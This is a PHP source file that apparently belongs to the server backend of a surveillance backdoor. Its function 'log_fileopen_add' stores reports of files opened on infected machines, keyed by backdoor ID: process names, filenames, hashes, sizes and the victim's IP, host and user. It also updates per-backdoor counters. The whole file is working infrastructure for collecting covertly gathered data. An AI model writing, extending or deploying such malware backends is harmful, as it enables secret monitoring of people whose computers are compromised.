<?php

//////////
///
///   log_fileopen.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_fileopen.add'] = array('func'   => 'log_fileopen_add',
                                'perm'   => AL_SERV,
                                'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_fileopen_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= process
   // varchar2  <= filename
   // varchar3  <= hash
   // varchar4  <= -
   // int1      <= sizehigh
   // int2      <= sizelow
   // int3      <= operation
   // longtext1 <= -
   // longblob1 <= -

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`varchar2`, ";
   $sql .=                    "`varchar3`, ";
   $sql .=                    "`int1`, ";
   $sql .=                    "`int2`, ";
   $sql .=                    "`int3`) ";
   $sql .= "VALUES ('$backdoor_id', 'FILEOPEN', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      $params = array(array('t' => 'i', 'v' => $log['flags']),
                      array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                      array('t' => 's', 'v' => $log['process']),
                      array('t' => 's', 'v' => $log['filename']),
                      array('t' => 's', 'v' => $log['hash']),
                      array('t' => 'i', 'v' => $log['sizehigh']),
                      array('t' => 'i', 'v' => $log['sizelow']),
                      array('t' => 'i', 'v' => $log['operation']));

      $ret = db_execute($stmt, $params);

      if(!is_success($ret)) {
         return $ret;
      }

      $sql  = "UPDATE `stat` ";
      $sql .= "SET `fileopen` = `fileopen` + 1, ";
      $sql .=     "`fileopen_new` = `fileopen_new` + 1 ";
      $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
